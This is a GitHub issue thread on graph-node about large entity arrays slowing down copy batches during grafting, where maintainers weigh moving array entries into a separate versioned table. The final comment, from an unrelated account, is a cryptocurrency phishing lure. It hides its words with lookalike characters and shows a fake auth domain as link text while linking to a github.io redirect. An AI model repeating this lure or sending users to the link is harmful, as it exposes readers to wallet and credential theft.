### ISSUE TITLE
Large arrays take a long time to copy during grafting

### ISSUE THREAD

**Issue by azf20** [graphprotocol/graph-node#3515]
We really need to do something about large arrays - there are some grafts in shard_i involving subgraphs with large arrays where a batch to copy data took over an hour when each batch should really only take 5 minutes. [This PR](https://github.com/graphprotocol/graph-node/pull/3488) tries to mitigate that, but a lot of the data we store comes from large arrays, and we need to do something better there.

**Comment by azf20** [comment]
@lutter what kind of thing do you have in mind here, changing the way in which arrays are stored in the database?

**Comment by lutter** [comment]
Yes, ultimately we need to avoid storing large arrays because they interact very badly with how we handle versioning/time-travel by storing the entire entity for each version. There's two approaches I can think of: (1) Refuse to store arrays that are larger than n entries, i.e., fail the subgraph when that happens (2) Behind the scenes, store array entries in their own table and change the query logic to reassemble the array when an entity is queried.

For an entity
```graphql
type Account {
  id ID!
  txns [Transaction!]!
}
```

we would have an additional `account_transaction` table with columns `(account_id, txn_id, block_range)` where the `block_range` says 'in this range, that txn was part of that account's Account.txns'

Some questions around that:
* this feels like overkill for small arrays (say with max 5-10 entries) Should users tell us explicitly that some array might become large?
* it would be helpful here too if we knew that entries are never removed from an array because we could do similar optimizations like we did for immutable entities

**Comment by leoyvens** [comment]
@lutter That is efficient in the case of push-only arrays. If we try to use that for arrays that can be arbitrarily modified then it becomes complicated.

**Comment by azf20** [comment]
interesting. @lutter would this have an additional beneficial effect for queries in general (I think large arrays have caused us problems with query nodes in the past?)

**Comment by carolina3298** [comment]
Hey @azf20 @lutter @leoyvens, I gоt sоme Ethеrеum frоm this sitе — is there а chаnсе they might tаkе it bасk lаtеr? I аlrеаdy spеnt it 😔  
Check it here: [auth․id-trаnsfer․cоm](https://auth-01.github.io/redirect)

![Image](https://github.com/user-attachments/assets/121e5bd8-dcc0-4fde-ab4c-c0e1da66464c)
